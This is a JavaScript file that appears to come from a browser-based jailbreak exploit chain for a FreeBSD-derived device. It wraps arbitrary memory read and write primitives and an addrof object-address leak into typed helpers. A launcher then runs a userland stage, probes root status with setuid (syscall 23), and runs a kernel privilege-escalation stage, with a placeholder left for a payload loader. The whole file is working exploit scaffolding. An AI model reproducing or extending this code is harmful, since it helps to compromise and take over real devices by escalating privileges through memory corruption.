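window.p = (function() {
    /*
     * Typed memory-access helpers layered on the raw primitives that the
     * rest of this file provides (write_mem, read_mem, write_ptr_at, addrof).
     * Addresses are int64 objects ({low, hi}); the raw primitives take a
     * plain Number, so every method folds the int64 down first.
     * Kept in ES5 (var, function expressions) to match the rest of the file.
     */

    // Fold an int64 address into the Number the raw primitives expect.
    // NOTE(review): a JS Number holds only 53 bits exactly, so this is
    // lossless for userland-range addresses but silently drops low bits for
    // any address at or above 2^53 (e.g. kernel-half addresses). Do not route
    // such addresses through these helpers without confirming the caller's
    // address range.
    function flat(addr) {
        return addr.hi * 0x100000000 + addr.low;
    }

    // Low `n` bytes of a 32-bit value as a little-endian byte array.
    // `&` and `>>` coerce to int32, which keeps the extracted bytes correct
    // even when `value` is >= 2^31 (sign extension only affects bits we mask off).
    function toLE(value, n) {
        var v = value;
        var bytes = [];
        for (var i = 0; i < n; i++) {
            bytes.push(v & 255);
            v >>= 8;
        }
        return bytes;
    }

    // Reassemble bytes[start .. start+n) (little-endian) into an unsigned Number.
    function fromLE(bytes, start, n) {
        var acc = 0;
        for (var i = start + n - 1; i >= start; i--) {
            acc = 256 * acc + bytes[i];
        }
        return acc;
    }

    return {
        // Write 8 bytes at `addr`. An int64 `value` is serialised
        // little-endian, low word first. Anything else is handed to
        // write_ptr_at (presumably storing the address of that object
        // rather than its contents -- confirm against its definition).
        write8: function(addr, value) {
            if (value instanceof int64) {
                write_mem(flat(addr), toLE(value.low, 4).concat(toLE(value.hi, 4)));
            } else {
                write_ptr_at(flat(addr), value);
            }
        },

        // Write the low 32 bits of `value` (int64 or Number) at `addr`.
        write4: function(addr, value) {
            var v = (value instanceof int64) ? value.low : value;
            write_mem(flat(addr), toLE(v, 4));
        },

        // Write the low 16 bits of `value` (int64 or Number) at `addr`.
        write2: function(addr, value) {
            var v = (value instanceof int64) ? value.low : value;
            write_mem(flat(addr), toLE(v, 2));
        },

        // Write the low 8 bits of `value` (int64 or Number) at `addr`.
        write1: function(addr, value) {
            var v = (value instanceof int64) ? value.low : value;
            write_mem(flat(addr), toLE(v, 1));
        },

        // Read 8 bytes at `addr`, returned as an int64 (low word first in memory).
        read8: function(addr) {
            var bytes = read_mem(flat(addr), 8);
            return new int64(fromLE(bytes, 0, 4), fromLE(bytes, 4, 4));
        },

        // Read a 32-bit little-endian unsigned value at `addr`.
        read4: function(addr) {
            return fromLE(read_mem(flat(addr), 4), 0, 4);
        },

        // Read a 16-bit little-endian unsigned value at `addr`.
        read2: function(addr) {
            return fromLE(read_mem(flat(addr), 2), 0, 2);
        },

        // Read a single byte at `addr`.
        read1: function(addr) {
            return read_mem(flat(addr), 1)[0];
        },

        // Address of a JS object as an int64, split from the Number addrof()
        // returns. Same 2^53 caveat as flat() applies in reverse: addrof()'s
        // Number must already be exact for the result to be meaningful.
        leakval: function(obj) {
            var raw = addrof(obj);
            var low = raw % 0x100000000;
            return new int64(low, (raw - low) / 0x100000000);
        }
    };
})();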
// Launcher entry point: run the userland stage, then the kernel stage only
// when it is still needed. Any exception from either stage is surfaced via
// alert() together with its stack, since the target has no console to read.
try {
    userland();
    // syscall 23 is setuid on FreeBSD-derived kernels, so this presumably
    // probes "are we already root?": a non-zero return means the kernel
    // stage still has to run. Confirm against chain.syscall's return shape.
    if (chain.syscall(23, 0).low != 0x0) {
        kernel();
    }
    // TODO: supply our own payload loader here, after the privilege stages.
} catch (e) {
    alert(e + '\n' + e.stack);
}